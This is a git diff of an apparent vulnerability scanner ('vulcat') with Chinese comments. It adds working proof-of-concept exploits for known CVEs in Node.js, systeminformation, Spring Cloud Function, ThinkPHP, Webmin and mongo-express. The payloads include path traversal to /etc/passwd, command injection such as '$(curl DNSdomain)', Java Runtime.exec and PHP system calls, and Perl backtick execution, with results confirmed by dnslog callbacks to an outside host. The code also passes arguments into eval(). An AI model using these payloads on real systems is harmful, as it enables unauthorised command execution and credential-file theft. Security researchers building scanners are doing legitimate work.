+ def cve_2019_10758_scan(self, url):
+ ''' 如果可以成功登录, 或者目标服务器没有修改默认的账号密码(admin:pass), 则可以执行任意node.js代码 '''
+ sessid = '3d2f0881262d8bd19e65a6ce89229c5e'
+
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'RCE'
+ vul_info['vul_id'] = 'CVE-2019-10758'
+ vul_info['vul_method'] = 'POST'
+
+
+ for payload in self.cve_2019_10758_payloads:
+ md = random_md5() # * 随机md5值, 8位
+ dns_domain = md + '.' + dns.domain(sessid) # * dnslog/ceye域名
+
+ path = payload['path']
+ data = payload['data'].replace('DNSdomain', dns_domain)
+ headers = payload['headers']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['headers'] = headers
+ vul_info['target'] = target
+
+ try:
+ res = requests.post(
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ sleep(2)
+ if (md in dns.result(md, sessid)):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Payload': res
+ }
+ return results
+
+ def addscan(self, url, vuln=None):
+ if vuln:
+ return eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url))
+
+ return [
+ thread(target=self.cve_2019_10758_scan, url=url)
+ ]
+
+mongoexpress = MongoExpress()
diff --git a/payloads/Nodejs.py b/payloads/Nodejs.py
new file mode 100644
index 0000000..bd301bb
--- /dev/null
+++ b/payloads/Nodejs.py
@@ -0,0 +1,207 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Joyent Node.js是美国Joyent公司的一套建立在Google V8 JavaScript引擎之上的网络应用平台
+ Nodejs扫描类:
+ 1. Node.js 目录穿越
+ CVE-2017-14849
+ Payload: https://vulhub.org/#/environments/node/CVE-2017-14849/
+
+ 2. Node.js 命令执行
+ CVE-2021-21315
+ Payload: https://blog.csdn.net/weixin_47179815/article/details/125799014
+
+file:///etc/passwd
+file:///C:\Windows\System32\drivers\etc\hosts
+'''
+
+from lib.api.dns import dns
+from lib.initial.config import config
+from lib.tool.md5 import md5, random_md5
+from lib.tool.logger import logger
+from lib.tool.thread import thread
+from lib.tool import check
+from thirdparty import requests
+from time import sleep
+
+class Nodejs():
+ def __init__(self):
+ self.timeout = config.get('timeout')
+ self.headers = config.get('headers')
+ self.proxies = config.get('proxies')
+
+ self.app_name = 'Node.js'
+ self.md = md5(self.app_name)
+ self.cmd = 'echo ' + self.md
+
+ self.cve_2017_14849_payloads = [
+ {
+ 'path': 'static/%2e%2e/%2e%2e/%2e%2e/a/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd',
+ 'data': ''
+ },
+ {
+ 'path': '%2e%2e/%2e%2e/%2e%2e/a/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd',
+ 'data': ''
+ },
+ {
+ 'path': 'static/%2e%2e/%2e%2e/%2e%2e/a/%2e%2e/%2e%2e/%2e%2e/%2e%2e/C:/Windows/System32/drivers/etc/hosts',
+ 'data': ''
+ },
+ {
+ 'path': '%2e%2e/%2e%2e/%2e%2e/a/%2e%2e/%2e%2e/%2e%2e/%2e%2e/C:\\Windows\\System32\\drivers\\etc\\hosts',
+ 'data': ''
+ }
+ ]
+
+ self.cve_2021_21315_payloads = [
+ {
+ 'path': 'api/getServices?name[]=$(curl DNSdomain)',
+ 'data': ''
+ },
+ {
+ 'path': 'api/getServices?name[]=$(ping -c 4 DNSdomain)',
+ 'data': ''
+ },
+ {
+ 'path': 'api/getServices?name[]=$(ping DNSdomain)',
+ 'data': ''
+ },
+ {
+ 'path': 'getServices?name[]=$(curl DNSdomain)',
+ 'data': ''
+ },
+ {
+ 'path': 'getServices?name[]=$(ping -c 4 DNSdomain)',
+ 'data': ''
+ },
+ {
+ 'path': 'getServices?name[]=$(ping DNSdomain)',
+ 'data': ''
+ }
+ ]
+
+ def cve_2017_14849_scan(self, url):
+ ''' Joyent Node.js 8.6.0之前的8.5.0版本中存在安全漏洞
+ 远程攻击者可利用该漏洞访问敏感文件
+ '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'File-Read'
+ vul_info['vul_id'] = 'CVE-2017-14849'
+ vul_info['vul_method'] = 'GET'
+ vul_info['headers'] = {}
+
+ # headers = self.headers.copy()
+ # headers.update(vul_info['headers'])
+
+ for payload in self.cve_2017_14849_payloads:
+ path = payload['path']
+ data = payload['data']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['target'] = target
+
+ try:
+ res = requests.get(
+ target,
+ timeout=self.timeout,
+ headers=self.headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if (('/sbin/nologin' in res.text)
+ or ('root:x:0:0:root' in res.text)
+ or ('Microsoft Corp' in res.text)
+ or ('Microsoft TCP/IP for Windows' in res.text)
+ ):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Payload': res
+ }
+ return results
+
+ def cve_2021_21315_scan(self, url):
+ ''' Node.js库中的systeminformation软件包中存在一个命令注入漏洞,
+ 攻击者可以通过在未经过滤的参数中注入Payload来执行系统命令
+ '''
+ sessid = 'ea16de03573ce0c2f731fa40de93ecd7'
+
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'RCE'
+ vul_info['vul_id'] = 'CVE-2021-21315'
+ vul_info['vul_method'] = 'GET'
+ vul_info['headers'] = {}
+
+ # headers = self.headers.copy()
+ # headers.update(vul_info['headers'])
+
+ for payload in self.cve_2021_21315_payloads:
+ md = random_md5() # * 随机md5值, 8位
+ dns_domain = md + '.' + dns.domain(sessid) # * dnslog/ceye域名
+
+ path = payload['path'].replace('DNSdomain', dns_domain)
+ data = payload['data']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['target'] = target
+
+ try:
+ res = requests.get(
+ target,
+ timeout=self.timeout,
+ headers=self.headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ sleep(2)
+ if (md in dns.result(md, sessid)):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Payload': res
+ }
+ return results
+
+ def addscan(self, url, vuln=None):
+ if vuln:
+ return eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url))
+
+ return [
+ thread(target=self.cve_2017_14849_scan, url=url),
+ thread(target=self.cve_2021_21315_scan, url=url)
+ ]
+
+nodejs = Nodejs()
diff --git a/payloads/ShowDoc.py b/payloads/ShowDoc.py
index f174dbb..0076133 100644
--- a/payloads/ShowDoc.py
+++ b/payloads/ShowDoc.py
@@ -102,22 +102,16 @@ def cnvd_2020_26585_scan(self, url):
except requests.ConnectionError:
logger.logging(vul_info, 'Faild')
return None
- # except:
- # logger.logging(vul_info, 'Error')
- # return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
if ('cnvd/2020/26585' in check.check_res(res2.text, 'cnvd/2020/26585')):
results = {
'Target': target,
'Verify': file_path,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Path': path,
- 'Headers': headers,
- 'Data': data
- }
+ 'Payload': res
}
return results
diff --git a/payloads/Spring.py b/payloads/Spring.py
index 254e53a..75c8c3b 100644
--- a/payloads/Spring.py
+++ b/payloads/Spring.py
@@ -96,6 +96,14 @@ def __init__(self):
'Content-Type': 'text/plain'
})
},
+ {
+ 'path': 'functionRouter',
+ 'data': 'mouse',
+ 'headers': head.merge(self.headers, {
+ 'spring.cloud.function.routing-expression': 'T(java.lang.Runtime).getRuntime().exec("ping -c 4 dnsdomain")',
+ 'Content-Type': 'text/plain'
+ })
+ },
{
'path': 'functionRouter',
'data': 'mouse',
@@ -233,13 +241,7 @@ def cve_2022_22965_scan(self, url):
results = {
'Target': verify_url,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Payload': {
- 'Method': vul_info['vul_method'],
- 'Url': url,
- 'Path': path,
- 'Data': data,
- 'Headers': vul_info['headers']
- }
+ 'Payload': res
}
return results
@@ -412,13 +414,7 @@ def cve_2022_22963_scan(self, url):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Path': path,
- 'Data': data,
- 'Headers': headers
- }
+ 'Payload': res
}
return results
diff --git a/payloads/ThinkPHP.py b/payloads/ThinkPHP.py
index 35909c1..1f70455 100644
--- a/payloads/ThinkPHP.py
+++ b/payloads/ThinkPHP.py
@@ -87,6 +87,11 @@ def __init__(self):
]
self.cve_2018_1002015_payloads = [
+ {
+ 'path': 'index.php?s=index/\\think\\Container/invokefunction',
+ 'data': 'function=call_user_func_array&vars[0]=system&vars[1][]='+self.cmd,
+ 'headers': head.merge(self.headers, {})
+ },
{
'path': 'index.php?s=index/\\think\\Container/invokefunction',
'data': 'function=call_user_func_array&vars[0]=system&vars[1][]=cat /etc/passwd',
@@ -239,12 +244,7 @@ def cnnvd_201901_445_scan(self, url):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Path': path,
- 'Data': data
- }
+ 'Payload': res
}
return results
@@ -401,18 +401,14 @@ def cve_2018_1002015_scan(self, url):
return None
if (('root:x:0:0:root' in res.text)
+ or (self.md in check.check_res(res.text, self.md))
or (('PHP Version' in res.text)
and ('PHP License' in res.text))
):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Path': path,
- 'Data': data
- }
+ 'Payload': res
}
return results
diff --git a/payloads/Weblogic.py b/payloads/Weblogic.py
index be14a37..34d0eee 100644
--- a/payloads/Weblogic.py
+++ b/payloads/Weblogic.py
@@ -352,13 +352,7 @@ def cve_2019_2725_scan(self, url):
results = {
'Target': verify_url,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
- 'Payload': {
- 'url': url,
- 'Path': path,
- 'Data': data,
- 'Headers': vul_info['headers']
- }
+ 'Payload': res
}
return results
@@ -424,13 +418,7 @@ def cve_2017_10271_scan(self, url):
results = {
'Target': verify_url,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
- 'Payload': {
- 'url': url,
- 'Path': path,
- 'Data': data,
- 'Headers': vul_info['headers']
- }
+ 'Payload': res
}
return results
diff --git a/payloads/Webmin.py b/payloads/Webmin.py
index cd7921c..ad1966f 100644
--- a/payloads/Webmin.py
+++ b/payloads/Webmin.py
@@ -3,12 +3,15 @@
'''
Webmin是一个基于Web的系统配置工具, 用于类Unix系统: https://www.webmin.com/
-该漏洞存在于密码重置页面,允许未经身份验证的用户通过简单的 POST 请求执行任意命令。
Webmin扫描类:
1. Webmin Pre-Auth 远程代码执行
CVE-2019-15107
Payload: https://vulhub.org/#/environments/webmin/CVE-2019-15107/
+ 2. Webmin 远程代码执行
+ CVE-2019-15642
+ Payload: https://www.seebug.org/vuldb/ssvid-98065
+
file:///etc/passwd
file:///C:\Windows\System32\drivers\etc\hosts
'''
@@ -19,6 +22,7 @@
from lib.tool.logger import logger
from lib.tool.thread import thread
from lib.tool import check
+from lib.tool import head
from thirdparty import requests
from time import sleep
@@ -39,8 +43,28 @@ def __init__(self):
},
]
+ self.cve_2019_15642_payloads = [
+ {
+ 'path': 'rpc.cgi',
+ 'data': 'OBJECT Socket;print "Content-Type: text/plain\\n\\n";$cmd=`{}`; print "$cmd\\n\\n";'.format(self.cmd),
+ 'headers': head.merge(self.headers, {})
+ },
+ {
+ 'path': 'rpc.cgi',
+ 'data': 'OBJECT Socket;print "Content-Type: text/plain\\n\\n";$cmd=`{}`; print "$cmd\\n\\n";'.format(self.cmd),
+ 'headers': head.merge(self.headers, {
+ 'User-Agent': 'webmin',
+ 'Accept': 'application/json, text/javascript, */*; q=0.01',
+ 'Accept-Language': 'fr',
+ 'Accept-Encoding': 'gzip, deflate'
+ })
+ },
+ ]
+
def cve_2019_15107_scan(self, url):
- ''' '''
+ ''' 该漏洞存在于密码重置页面(password_change.cgi), 允许未经身份验证的用户通过简单的POST请求执行任意命令
+ 当用户开启Webmin密码重置功能后, 攻击者可以通过发送POST请求在目标系统中执行任意命令, 且无需身份验证。
+ '''
vul_info = {}
vul_info['app_name'] = self.app_name
vul_info['vul_type'] = 'RCE'
@@ -87,13 +111,59 @@ def cve_2019_15107_scan(self, url):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Path': path,
- 'Data': data,
- 'Headers': vul_info['headers']
- }
+ 'Payload': res
+ }
+ return results
+
+ def cve_2019_15642_scan(self, url):
+ ''' Webmin 1.920及之前版本中的rpc.cgi文件存在安全漏洞, 攻击者可借助特制的对象名称利用该漏洞执行代码
+ 需要身份验证(Cookie、Authorization等)
+ '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'RCE'
+ vul_info['vul_id'] = 'CVE-2019-15642'
+ vul_info['vul_method'] = 'POST'
+
+ for payload in self.cve_2019_15642_payloads:
+ path = payload['path']
+ data = payload['data']
+ headers = payload['headers']
+ target = url + path
+
+ headers['Referer'] = 'https://{}/session_login.cgi'.format(logger.get_domain(url))
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['headers'] = headers
+ vul_info['target'] = target
+
+ try:
+ res = requests.post(
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if (self.md in check.check_res(res.text, self.md)):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Payload': res
}
return results
@@ -102,7 +172,8 @@ def addscan(self, url, vuln=None):
return eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url))
return [
- thread(target=self.cve_2019_15107_scan, url=url)
+ thread(target=self.cve_2019_15107_scan, url=url),
+ thread(target=self.cve_2019_15642_scan, url=url)
]
webmin = Webmin()
diff --git a/payloads/demo.py b/payloads/demo.py
index 925f21b..3567287 100644
--- a/payloads/demo.py
+++ b/payloads/demo.py
@@ -88,6 +88,7 @@ def 6_scan(self, url): # ! 6: POC的名称(例如 c
key1: value1
key2: value2
...
+ Response类型: 会以一个http数据包的格式进行显示
'''
if ('11'): # ! 11: 判断扫描结果
results = {
@@ -97,10 +98,10 @@ def 6_scan(self, url): # ! 6: POC的名称(例如 c
'Payload': {
'Url': url,
'Path': path,
- 'Data': data,
- 'Cookie': 'xxx',
- 'Headers': vul_info['headers']
- }
+ 'Headers': headers,
+ 'Cookie': 'XXX'
+ },
+ 'Request': res # * 会输出一个http数据包
}
return results
diff --git a/payloads/demo2.py b/payloads/demo2.py
index b945d20..d3fc0b0 100644
--- a/payloads/demo2.py
+++ b/payloads/demo2.py
@@ -101,6 +101,7 @@ def 7_scan(self, url): # ! 7: POC的名称(例如 c
key1: value1
key2: value2
...
+ Response类型: 会以一个http数据包的格式进行显示
'''
if ('12'): # ! 12: 判断扫描结果
results = {
@@ -110,10 +111,10 @@ def 7_scan(self, url): # ! 7: POC的名称(例如 c
'Payload': {
'Url': url,
'Path': path,
- 'Data': data,
- 'Cookie': 'xxx',
- 'Headers': headers
- }
+ 'Headers': headers,
+ 'Cookie': 'XXX'
+ },
+ 'Request': res # * 会输出一个http数据包
}
return results
diff --git a/vulcat.py b/vulcat.py
index bf42dd5..c72fc54 100644
--- a/vulcat.py
+++ b/vulcat.py
@@ -19,9 +19,11 @@
corescan.start() # * 开始扫描
else:
print('''Please specify parameters, example:
- python3 f.py -h
- python3 f.py -u http://www.example.com/
- python3 f.py -f url.txt
+ python3 vulcat.py -h
+ python3 vulcat.py -u http://www.example.com/
+ python3 vulcat.py -f url.txt
+ python3 vulcat.py --list
+ python3 vulcat.py --version
''')
except KeyboardInterrupt:
print(color.reset('CTRL + C exit the scan'))